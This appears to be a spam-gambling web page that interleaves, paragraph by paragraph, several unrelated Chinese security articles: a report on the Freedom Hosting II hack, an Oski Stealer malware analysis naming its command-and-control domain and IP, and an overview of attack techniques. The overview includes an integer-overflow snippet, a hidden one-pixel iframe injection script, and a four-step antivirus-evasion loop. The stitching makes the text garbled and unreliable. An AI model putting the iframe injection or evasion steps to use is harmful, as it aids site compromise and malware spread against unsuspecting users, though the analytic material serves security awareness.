澳门新葡亰平台官网知己知彼 黑客常用攻击手法大揭秘

by admin on 2020年4月20日

澳门新葡亰平台官网 1

澳门新葡亰平台官网 2

据外媒报道,当地时间 2 月 3 日,1 万多个 Tor
网站遭匿名黑客组织攻击,当访问者进入这些网站时会看到以下信息 —
「你好,Freedom Hosting II(以下简称
FH2),你已被黑客入侵。」 据独立安全调查员 Sarah Jamie Lewis
公布的一份报告显示,FH2 总共运行了近 20%
的黑市网站。而没过多久,自称发起该攻击的黑客组织联系媒体并提供了细节信息。

  最近一台被黑客控制的服务器被发现,上面包含了1.4GB从世界各地被感染计算机窃取来的企业和个人数据,其中包含众多银行帐号信息和5000多个大型金融机构的日志文件。为了更好的防护自己,我们需要了解黑客进行入侵和攻击的手法。安全业著名记者Davey
Winder近日发表分析文章,从一个黑客的角度揭示了他们经常使用的技术。

最近国外安全研究人员发现一款新型的窃密木马Oski
Stealer正在地下黑客论坛进行广告宣传,其中包含一些俄罗斯黑客论坛,该恶意软件旨在收集敏感信息,例如浏览器登录凭据、信用卡数据、钱包帐户数据等,并且已经窃取了50000多个密码,主要通过垃圾邮件网络钓鱼进行传播感染,针对Windows
7、8、8.1和10的x86和x64版本,并且可以在没有管理员权限的情况下安装,该恶意软件目前主要针对美国地区用户进行攻击,窃取了大量Google帐户密码

澳门新葡亰平台官网 3

  黑客作为英雄的时代已经过去,今天多数黑客的目光都盯在了金钱上,其攻击的主要目标是商业公司的客户数据库。因为这些数据中包含了大量的信用卡信息、个人数据和其它有助于其窃取银行账号的信息。据市场分析机构Gartner表示,大约有75%的安全入侵都是通过软件安全漏洞进行的。鉴于企业越来越多的使用基于Web的应用,这个结果并不令人感到惊讶。

OskiStealer窃密木马会盗取基于Chromium和Firefox的浏览器(Chromium、Chrome、Opera、Comodo
Dragon、Yandex、Vivaldi、Firefox、PaleMoon、Cyberfox、BlackHawk、K-Meleon等)登录凭据,以及来自Filezilla和加密货币钱包(Bitcoin
Core、以太坊、ElectrumLTC、Monero、Electrum、Dash、Litecoin、ZCash等)的加密货币数据,主要通过从注册表、浏览器SQLite数据库中提取相应的登录凭证数据,并使用DLL注入浏览器进程盗取钱包数据

黑客组织在邮件中写道:“实际上,这是我的第一次攻击。我就是刚好有这么一个想法。”
据该组织披露,其最先是在 1 月 30 日攻破
FH2,但当时只拥有阅读权限,也就是说,那个时候他们还无法进行任何的文件更改或删除。

  对于黑客来说,获取数据访问权限的最简单方法之一就是发现系统的一个后门,导致该后门的原因可能是不妥当的软件配置,或者编程漏洞,或者未能即时安装已经发布的漏洞补丁。

国外安全研究人员研究之后,发现Oski
Stealer窃密木马目前尚处于早期阶段,并已经成功针对美国(北美地区)的用户发起了网络攻击,窃取了大量登录浏览器凭据数据,未来会不会在全球范围内流行,需要持续观察跟踪

“一开始,我并没有打算攻下
FH2,只是想看看”,黑客组织说道,但后来他们在上面发现了几个大型的儿童色情网站。通常情况下,FH2
为每个网站提供的磁盘配额只有 256 MB,但这些非法网站却达到了 GB
级别。正因为如此,黑客才决定对其发起进一步的攻击。该黑客组织宣称,他们已经在上面发现了
10 个儿童色情网站,其文件占用的空间有 30GB。

  一、利用整数溢出(integer overflow)

笔者捕获到一例OskiStealer最新的病毒样本,该样本使用UPX加壳处理,如下所示:

至于是如何拿下 FH2,黑客表示他们仅用了 21
个步骤就得以实现。简而言之,先创建一个新的 FH2 网站或登录已有的一个 FH2
网站,然后对配置文件中的一些设置展开调整,随后对某一目标的密码进行重置、打开
root 访问,最后使用全新的系统权限重新登录即可。

  无论是随意的编程,还是懒散的补丁安装,都可以给用户带来整数溢出安全缺陷,而它正是最受黑客喜爱的入侵方法之一。那么什么是整数溢出?它可以给黑客带来什么好处?简单的说,数字溢出是一种软件行为,导致的原因是数字运算的结果超出了系统所能处理的范围。安全专业厂商Coverity的C/C++和Java程序员Sumant
Kowshik表示,“当一个数字运算得出了一个系统位宽无法存储的大结果时,该结果会被截取,会得到异常的结果值,这个溢出的值可以被用来实现一个关键的操作,诸如数组索引、内存分配或内存废弃等。”这类行为不仅可以让软件崩溃,而且还可以被黑客利用来访问系统中的特权内存内容。

脱壳之后,对样本进行详细分析

澳门新葡亰平台官网 4

澳门新葡亰平台官网 5

1.在临时目录下生成makefile.input.makegen文件,如下所示:

该黑客表示,他们已经公布了大量来自 FH2
的系统文件,但并未涉及用户数据。考虑到 FH2
网站存有大量的儿童色情内容,所以他们并不打算对外公开,但他们倒是愿意将其提供给将会把这些数据提交给执法部门的安全研究员。

  实际上,所有这些安全缺陷都与数字运算产生不可信赖、用户可修改数值有关,潜在的溢出结果数据被用来作为进行诸如内存分配或缓冲区索引之类的关键操作。Kowshik表示,“通过利用整数溢出来重写任意存储位置,黑客能够以超级用户权限来运行安全关键应用,在现实世界软件中的整数溢出安全缺陷实例中,攻击者可以使用任意代码的地址来覆盖程序需要跳转的地址。”以下整数溢出除了打印错误值之外并不进行任何操作,因此该程序并不会造成破坏:

2.写入数据到makefile.input.makegen文件,如下所示:

来自:cnBeta.COM

      X = 0; 
if (a > MAX_INT /2 && b > MAX_INT / 2) 
/* x will *not* be equal to a + b */ 
x = a + b; 
print(“x = %d"n”, x);

3.请求主机上的相关文件到远程服务器,下载对应的文件到主机,如下所示:

  但是,有时候一个恶意用户可以借助整数溢出来控制内存分配尺寸,并且让系统执行恶意操作,诸如以下代码:

远程服务器地址:petordementyev.pw

      x = get_some_number_from_a_packet() 
/*overflow in computation */ 
P = malloc(x * sizeof(int)); 
/* bad problem here */ 
P[x-1] = 0;

澳门新葡亰平台官网,相关的文件列如下:

  这种方法看似有些麻烦,是许多脚本小子(script-kiddies)们使用的方法,不过,借助于最新的现成恶意软件工具,只需点击几下鼠标就可以实现这种复杂的攻击。

softokn3.dll,sqlite3.dll,freebl3.dll,mozglue.dll,msvcp140.dll,nss3.dll,vcruntime140.dll

  二、Web漏洞利用工具集(Web Exploit Toolkits)

捕获到的流量数据,如下所示:

  Web漏洞利用工具集已经存在了很长时间,目前已经存在了许多不同的工具集,诸如MPack、IcePack、AdPack,当然还有Neosploit。花钱不多即可从网上买到这类工具,购买后一个小时内即可将其激活。购买者所需要做的就是增加一个键盘记录器路径,输入所希望的数据发送目的地,并将其运行在某个服务器上。然后就是发送垃圾信息来引诱攻击目标到陷阱网站上。

下载的文件,如下所示:

澳门新葡亰平台官网 6

4.获取主机相关信息,如下所示:

  正如杀毒软件公司AVG的首席研究官Roger
Thompson所言,几乎所有的Web漏洞利用工具集都可以追溯到WebAttacker。“当访问者被引诱到一个WebAttacker网站时,它可以检查其浏览器和操作系统的类型,可以查看是否安装了特定应用程序,然后将它认为最容易被利用的漏洞发送给攻击者。”另外,它还将跟踪你的IP地址,更有趣的是,对于一种漏洞利用方式,它只进行一次尝试。Tompson表示,“其基本指导思想是,如果你是一个真正的用户,它们在利用一个漏洞攻击你时,要么第一次取得成功,要么就永远不会成功。”

5.主机截屏操作,如下所示:

  WebAttacker一直备受黑客的喜爱,不过在2006年其新增了一些漏洞利用方法未能正常使用后,它逐渐被人们所放弃。几个月后,MPack和Neosploit先后问世,这两个工具集都增加了更好的加密,同时还增加了更频繁和准确的漏洞利用方法更新。

6.通过调用下载的相关文件,获到主机上相关信息,上传到远程服务器,远程服务器地址URL:petordementyev.pw/main.php,
如下所示:

  三、借助子框架

捕获到的流量数据,如下所示:

  尽管多数普通被感染网站欺骗用户的方法依然是简单的链接垃圾信息,不过仅仅依靠欺骗下载和含有恶意软件的色情网站的时代已经过去了。SophosLabs的首席病毒研究员Fraser
Howard表示,“通过入侵合法网站,攻击者可以增加某些恶意代码,当用户简单的浏览网页时就可以被加载这些恶意程序。当目标网站具有非常大的用户群时,这个技术可能非常有效。”HTML提供了非常方便的方式来加载附加内容。

7.最后将获取到的主机数据信息打包,上传到远程服务器,捕获到的相关流量数据,如下所示:

澳门新葡亰平台官网 7

上传的打包的数据信息,如下所示:

  用于入侵网站的最常见方法之一包括使用标签,该方法可以用来悄然加载内容到网页中。Howard解释称,“在许多网站上该标签被广泛应用,iframe标签支持好几个属性。被恶意攻击者最经常使用的是它的width和Height属性,它们可以被用来控制该框架在页面中的大小。为了不让被攻击者发现,多数恶意子框架通常使用非常小的width/height数值。”

8.从数据包流量中DUMP获取到的主机数据信息,解压之后,如下所示:

  由于许多合法的Web页面也使用具有相同属性的iframe标签,对受感染网页的提前探测就非常关键。举例来说,Pintadd攻击借助于使用iframe技术加载远程恶意内容的一个脚本来入侵了许多网站,攻击者只是进行了一点细微的修改。

9.获取到的主机信息,如下所示:

  Howard表示,“该脚本并没有简单的使用‘document.write()’,而是使用了‘createElement()’方法来创建一个iframe元素,然后设置其属性,并使用‘appendChild()’方法来将其添加到当前页面中。”

10.截屏信息,如下所示:

      var url=http://domain/path/index.php;  
var ifr=document.createElement(iframe);  
ifr.setAttribute(src,url);  
ifr.frameBorder=0;  
ifr.width=1;  
ifr.height=1;  
document.body.appendChild(ifr)

11.获取到的浏览器Cookies信息,如下所示:

  对于被攻击者来说,其最终效果与直接修改页面的iframe标签是完全一样的。对于安全产品来说,这是又一个需要克服的挑战。

12.获取到黑客远程服务器的login页面地址,相关的URL地址:

  四、发展僵尸网络

, 如下所示:

  病毒和恶意软件之间语义上的区别正在日渐模糊,病毒作者也已经逐渐转向追求经济利益。

13.黑客远程服务器Camp;C地址:194.87.98.216,微步在线查询结果,发现地址为俄罗斯莫斯科,如下所示:

  现在许多病毒的目标只是简单的修改HTML或PHP/ASP脚本,通常通过增加iframe标签作为感染过程的一部分。那么黑客如何通过病毒来获取金钱方面的收入?这个问题的答案有很多种,每个答案都基于能够使用命令及控制通道远程控制许多被感染的计算机(僵尸网络)。在你完成了传播过程后,任何现代病毒的主要功能就是通信通道。

从最近一两年跟踪的几款流行勒索病毒来看,背后的开发运营团队很大可能是俄罗斯黑客组织所为,同时这几款流行勒索病毒也一直在一个俄罗斯黑客论坛公布相关信息,包含此前的GandCrab勒索病毒和后面新出现的Sodinokibi勒索病毒,这款新型的窃密软件的服务器所在地也是俄罗斯,俄罗斯黑客组织现在在全球范围内活动非常频繁,这些盗取的数据,可能会被黑客组织放到地下黑客论坛或暗网进行出售,获取利益,可被其他黑客组织利用去进行其它网络攻击行为

  Fortinet威胁响应团队负责人Guillaume谈论了一个僵尸网络的工作原理。“现在从僵尸到僵尸控制者的通信一般是经过加密的,命令及控制通道也各不相同。最初阶段一般是一个IRC通道,它可能是一个Webserver,一个即时通讯系统或一个特定协议。它可以是分布式的,例如诸如Storm之类的现代P2P僵尸网络。”一旦一个僵尸控制者控制了大量被感染的计算机,他可以命令它们来发送垃圾广告信息,或安装广告插件来获得收入。僵尸控制者还可以将它们作为TCP/IP代理,来向那些希望匿名的计算机犯罪分子或恐怖分子出租,这些人可能使用它们来发起分布式拒绝服务攻击(DDoS)。当然,僵尸控制者自然不会放过被感染计算机上任何能给他带来经济收入的数据信息,其中包括银行数据、密码和软件许可等。

参考链接:

  五、借rootkit隐藏自己

经常听到一些人说现在病毒很少了,或者说现在已经没有病毒了,其实只是自己对这方面关注的不多,不是专业人士,并不太了解病毒,可能有时候自己已经中了病毒,电脑资料被盗了也不知道,再加上由于现在TO
C的杀毒软件不赚钱了,大多数杀毒软件不怎么维护了,有些甚至开始做起了流氓软件的“生意”,一些新的样本可能也无法及时检测,没有太多人重视这块,事实上全球各地每天都在发生各种恶意样本攻击事件,不断有新的恶意样本家族出现,已知的恶意样本家族也在不断变种,同时新的黑客组织不断涌现,旧的成熟的黑客组织也在研究新的网络攻击武器,开发新型的恶意软件,对于做黑产的来说,各种不同种类的恶意软件就是他们的“产品”,所以他们一定会不断研发新型的“产品”,能过这些“产品”获取利益,现在国内关注和了解的人可能并不多,深入逆向分析、追踪研究的人就更少了,最近几年其实各种恶意样本攻击事件层出不穷,包含各种勒索病毒、挖矿病毒、远控、后门、窃密木马、APT攻击、银行木马、基于Linux系统的各种物联网平台的僵尸网络变种等,笔者专业从事恶意软件的分析与研究十几年,精通基于各种不同平台的各种不同类型的恶意软件分析技术,一直在跟踪分析全球各种最新最流行的恶意软件,现在并不是“天下无贼”,而是各种各样的恶意软件层出不穷,希望大家跟我一起关注全球的恶意样本动态,提高安全意识,因为每天出现的各种恶意样本实在是太多了,因此发生的安全攻击事件也太多太多了,需要更多专业的安全从业者加入进来,全球大多数安全事件都是通过恶意样本发起攻击的,安全的本质永远是人与人的对抗,黑客组织会永不停止地开发和更新各种新型的恶意软件并对目标发起网络攻击行为,做安全与做黑产最直接的对抗就是恶意样本,攻与防永不停止,恶意样本更是无处不在

  正如Lovet所指出的那样,一个好的牧羊者应该保持其羊群的健康;一个僵尸网络控制者所拥有的僵尸计算机越多,他就可以赚取更多的金钱。鉴于此点,病毒使用启动注册表键和内核驱动加载器来保证重启后自己仍然被运行。另外,它们还尽量保持隐蔽,因为它们不希望被感染的计算机重装操作系统。Lovet表示,“以上要求导致了今天大部分病毒嵌入在rootkit模块中,以躲避用户和反病毒软件的眼睛。”

本文转自:安全分析与研究

  目前有两类相关的rootkit:内核级rootkit和用户级rootkit。前者直接将自己附着在操作系统内核中,以避免被任务管理器所列出,而后者一般是直接挂钩(hook)在系统API上。在任务管理器类应用程序中可以发现这类rootkit。据Lovet表示,恶意软件分发者一般通过以下四步来让病毒躲过扫描。

原文链接:

  1、修改病毒代码,并使用一个‘exe’封装程序对其重新封装,这会创建一个完全不同的二进制映像。

  2、提交该文件到一个公开或私有的躲避所有反病毒软件扫描的服务中。

  3、如果该文件被某些反病毒产品所检测到,那么重返第1步。

  4、分发。

      论坛URL

 

发表评论

电子邮件地址不会被公开。 必填项已用*标注

网站地图xml地图